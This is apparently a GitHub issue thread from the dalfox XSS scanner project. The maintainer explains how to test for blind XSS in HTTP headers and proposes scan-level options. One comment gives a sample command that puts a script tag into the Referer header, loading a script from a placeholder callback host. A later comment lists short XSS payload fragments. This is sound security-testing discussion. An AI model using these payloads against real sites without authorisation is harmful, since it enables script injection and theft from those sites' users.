### ISSUE TITLE
blind xss in Header

### ISSUE THREAD

**Issue by Sy3Omda** [hahwul/dalfox#78]
Hi,
i was wondering if dalfox test for blind xss in header OR it even make connection to the target host with add common payloads like xss hunter in request header like (Referer OR user-agent) .
and if that so ,how i debug the tool while it running and see the payload insertion in Header via bash ?
thx

**Comment by hahwul** [comment]
Hi @Sy3Omda 
Well, first of all, dalfox doesn't support scanning xss in headers by default. Relatively, the header-based XSS has few cases, and it is not included because the tool itself will be heavy if the testing vector increases.

Whether blind xss or common xss is common, we basically test path, url query, body data, etc. If you want to test blind xss in the header, you may need to put it separately with the `-H` option.

```
$ dalfox url ~~~ -H "Referer: asdf'><script src=//your.xss.ht></script>"
```

You can see how dalfox works by looking at the 2 codes below.

Make query code
https://github.com/hahwul/dalfox/blob/master/pkg/scanning/scan.go#L271

Payload pattern
https://github.com/hahwul/dalfox/blob/master/pkg/scanning/payload.go#L21

Also, I'm thinking about verbose options for debug. I'm checking and debugging the req/res by passing the request to the burp/zap or cli proxy with the `--proxy` option.

**Comment by hahwul** [comment]
@Sy3Omda 
Oh, and I'm also thinking about including headers in basic testing, but for this, I'm thinking of options like level, which means testing scope. If you have any good ideas, please share me :D

**Comment by hahwul** [comment]
e.g in my mind
```
--level 1 => reflected path / query / body
--level 2 => reflected path / query / body and all headers
--level 3 => all path / query / body / all headers
```

**Comment by Sy3Omda** [comment]
> e.g in my mind
> 
> ```
> --level 1 => reflected path / query / body
> --level 2 => reflected path / query / body and all headers
> --level 3 => all path / query / body / all headers
> ```

AND that would be great.
btw i tried reach u in twitter for quick idea sharing but u DMs looks busy .
anyway as u know some platform grep some header for analyst for different reasons and in that case we could hunt for some blind xss in header.
my last Q is .
what is the different BW dalfox AND XSpear and why two tools serving the same purpose?

**Comment by hahwul** [comment]
I think there are many things to improve! these days, it has become  common to miss DM (very many dm..). I'm sorry I didn't read

The anwser for last question. two tool to check the same point as you said. It's just a tool Dalfox created afterwards, and it's made to improve on the structural problems that I found while creating Xspear. It's also a big reason that the main language changed from ruby ​​to go, but in the end, Xspear had the worst combination of slow ruby ​​and selenium. To avoid that, dalfox applied DOM-based Verify logic and concurrency.

In conclusion, dalfox is a project to improve the structural shortcomings of xspear and is a project that can be maintained in the future.

**Comment by Sy3Omda** [comment]
i`m quite wonder with dalfox result .
what u do after getting ``` Reflected whatever param => inHTML[1]``` ?
which mean i guess that there is a possible dom xss in place

**Comment by hahwul** [comment]
@Sy3Omda 
Hi, 
An attempt was made to partialize the reflected interval to use a customized attack code to reduce unnecessary requests. However, I think detection rate is more important than speed, so I'm only going to provide the default as an option for full testing. Please refer to it. 

Answer from your question. if found inHTML point, it using a normal XSS payload. DOM XSS validation is difficult in the current situation because we don't use headless browsers such as Selenium.

e.g 
```
inHTML => <svg/~~~~>
inJS => "+alert`44`+"
```
